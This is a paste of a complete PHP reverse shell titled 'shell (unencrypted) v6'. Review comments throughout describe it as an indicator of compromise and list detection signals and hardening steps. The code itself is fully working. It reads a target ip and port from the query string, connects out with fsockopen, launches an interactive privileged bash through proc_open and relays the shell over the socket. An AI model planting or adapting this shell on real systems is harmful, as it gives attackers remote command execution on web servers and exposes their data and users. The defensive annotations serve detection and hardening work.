
shell (unencrypted) v6

a guest Jul 18th, 2019 78 Never
<?php
// Review summary: this is a PHP reverse shell. When the file is requested it
// connects out to the host and port given in the query string, starts
// /bin/bash through proc_open() and relays bytes between that socket and the
// shell's stdin/stdout/stderr until either side closes.
// Found on a web server, this file is an indicator of compromise.
//
// Static indicators visible in this listing: fsockopen() combined with
// proc_open() on a shell command line, set_time_limit(0),
// pcntl_fork()/posix_setsid(), and the printit() message strings.
//
// Hardening that blocks it (confirm against what the application needs):
// list proc_open, fsockopen and pcntl_fork in php.ini disable_functions,
// deny outbound connections from the web tier, and do not execute PHP from
// writable or upload directories.

// Lifts PHP's execution time limit so the relay loop below can run indefinitely.
set_time_limit (0);
// Not referenced anywhere else in this listing.
$VERSION = "1.0";
// The destination is taken straight from the request, with no validation and
// no authentication: whoever can reach this URL chooses where the shell
// connects. No callback address is stored in the file itself, so the ip= and
// port= query parameters in web access logs are where the endpoint shows up.
$ip = $_GET["ip"];
$port = $_GET["port"];
// Maximum number of bytes moved per fread() in the relay loop.
$chunk_size = 1400;
// Passed to stream_select() as the (empty) write and exception sets.
$write_a = null;
$error_a = null;
// -i asks bash for an interactive shell; -p is bash's privileged mode, in
// which the effective UID is not reset to the real UID when the two differ.
$shell = '/bin/bash -p -i';
// Set to 1 below once the fork + setsid sequence has succeeded.
$daemon = 0;
// When non-zero, every relayed chunk is also passed to printit().
$debug = 0;

// Detach from the request when the pcntl extension is available. The parent
// exits and the child becomes a session leader, so the shell is no longer
// tied to the process that served the HTTP request.
if (function_exists('pcntl_fork')) {
    // Fork and have the parent process exit
    $pid = pcntl_fork();

    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }

    if ($pid) {
        exit(0);  // Parent exits
    }

    // Make the current process a session leader
    // Will only succeed if we forked
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }

    $daemon = 1;
} else {
    // Without pcntl the script keeps running inside the original PHP process.
    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
// With the mask cleared, files created from the shell get whatever mode the
// creating program requests.
umask(0);

// Outbound TCP connection to the requester-chosen endpoint, with a 30 second
// connect timeout. An outbound connection initiated by a web/PHP worker
// process is a network-level detection point.
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

// The child is started by the PHP process and inherits its OS user. A PHP or
// web-server worker with an interactive bash child is a process-tree signal
// worth alerting on.
$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

// Relay loop: runs until the TCP peer or the shell's stdout reaches EOF.
while (1) {
    // Check for end of TCP connection
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }

    // Check for end of STDOUT
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }

    // Wait until a command is sent down $sock, or some
    // command output is available on STDOUT or STDERR
    // The null timeout makes stream_select() block until a stream is readable;
    // its return value is stored but never checked.
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    // If we can read from the TCP socket, send
    // data to process's STDIN
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }

    // If we can read from the process's STDOUT
    // send data down tcp connection
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }

    // If we can read from the process's STDERR
    // send data down tcp connection
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

// Tear down the socket, the three pipes and the child process handle.
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
// NOTE(review): $daemon is read here as a function-local variable, so as
// written the condition is always true and every message is printed. When the
// script runs inside the request these strings may end up in the HTTP
// response body, which makes them usable as response-content signatures.
function printit ($string) {
    if (!$daemon) {
        print "$string\n";
    }
}
?>